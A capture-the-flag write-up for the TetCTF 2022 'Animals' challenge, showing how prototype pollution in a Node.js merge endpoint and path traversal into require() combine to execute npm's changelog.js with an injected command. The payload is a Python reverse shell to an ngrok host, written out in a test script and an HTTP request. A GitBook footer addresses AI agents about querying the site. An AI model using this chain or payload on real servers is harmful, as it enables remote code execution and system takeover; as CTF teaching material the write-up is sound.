> For the complete documentation index, see [llms.txt](https://ctf.zeyu2001.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ctf.zeyu2001.com/2022/tetctf-2022/animals.md). # Animals {% file src="/files/H4fXFVRICqgDs7vtzwIF" %} There is a prototype pollution vulnerability in `/api/tet/list` when merging the request data: ```javascript app.post('/api/tet/list', function (req, res, next) { try { const getList1 = require("./static/list-2010-2016.js") const getList2 = require("./static/list-2017-2022.js") let newList = merge(getList1.all(), getList2.all()) let data = req.body.data || ""; newList = merge(newList, data); res.json(newList) } catch (error) { res.send(error) } }) ``` Furthermore, user input being passed to `require()` leads to a LFI vulnerability. ```javascript app.post('/api/tet/years', function (req, res, next) { try { const list = req.body.list.toString(); const getList = require("./static/" + list) res.json(getList.all()) } catch (error) { console.log(error); res.send(error) } }) ``` If we could find a *valid `.js` file* that *uses an attribute that we are able to pollute* to spawn a new process or execute a command, then we could escalate this to an RCE. In the Docker container, the most likely place where we could find a suitable candidate would be in the `node_modules` folder, containing the source code of the installed modules. Doing a simple search for the `child_process` string, we could find some interesting scripts: ``` $ cd /usr/local/lib/node_modules $ grep -r "child_process" . ... ./npm/scripts/changelog.js:const execSync = require('child_process').execSync ./npm/scripts/update-dist-tags.js:const { execSync } = require('child_process') ``` The `changelog.js` script indeed has an `execSync` call with a possible command injection. ```javascript 'use strict' /* Usage: node scripts/changelog.js [comittish] Generates changelog entries in our format as best as its able based on commits starting at comittish, or if that's not passed, latest. Ordinarily this is run via the gen-changelog shell script, which appends the result to the changelog. */ const execSync = require('child_process').execSync const branch = process.argv[2] || 'origin/latest' const log = execSync(`git log --reverse --pretty='format:%h %H%d %s (%aN)%n%b%n---%n' ${branch}...`).toString().split(/\n/) ``` Since the `require()` call would not pass in any arguments, `process.argv[2]` is undefined. Therefore, we can pollute `process.argv[2]` with a command injection payload before importing the `changelog.js` file. Testing this locally: ```javascript let a = {} const isObject = obj => obj && obj.constructor && obj.constructor === Object; const merge = (dest, src) => { for (var attr in src) { console.log(attr); if (isObject(dest[attr]) && isObject(src[attr])) { merge(dest[attr], src[attr]); } else { dest[attr] = src[attr]; } } return dest }; b = { ['__proto__']: { '2': "; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"6.tcp.ngrok.io\",13984));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")';" } } merge(a, b); require('./changelog.js'); ``` To perform this exploit chain on web server, we first perform the prototype pollution: ```http POST /api/tet/list HTTP/1.1 ... Content-Type: application/json { "data": { "__proto__": { "2":"; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"6.tcp.ngrok.io\",13984));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")';" } } } ``` Then, we exploit the LFI vulnerability to execute the `changelog.js` script. ```http POST /api/tet/years HTTP/1.1 ... Content-Type: application/json Content-Length: 81 {"list":"../../../../../usr/local/lib/node_modules/npm/scripts/changelog.js"} ``` This should grant us our reverse shell. ``` $ cd / $ ./readflag TetCTF{c0mbine_p0lLut3_lFiii_withN0d3<3} ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://ctf.zeyu2001.com/2022/tetctf-2022/animals.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.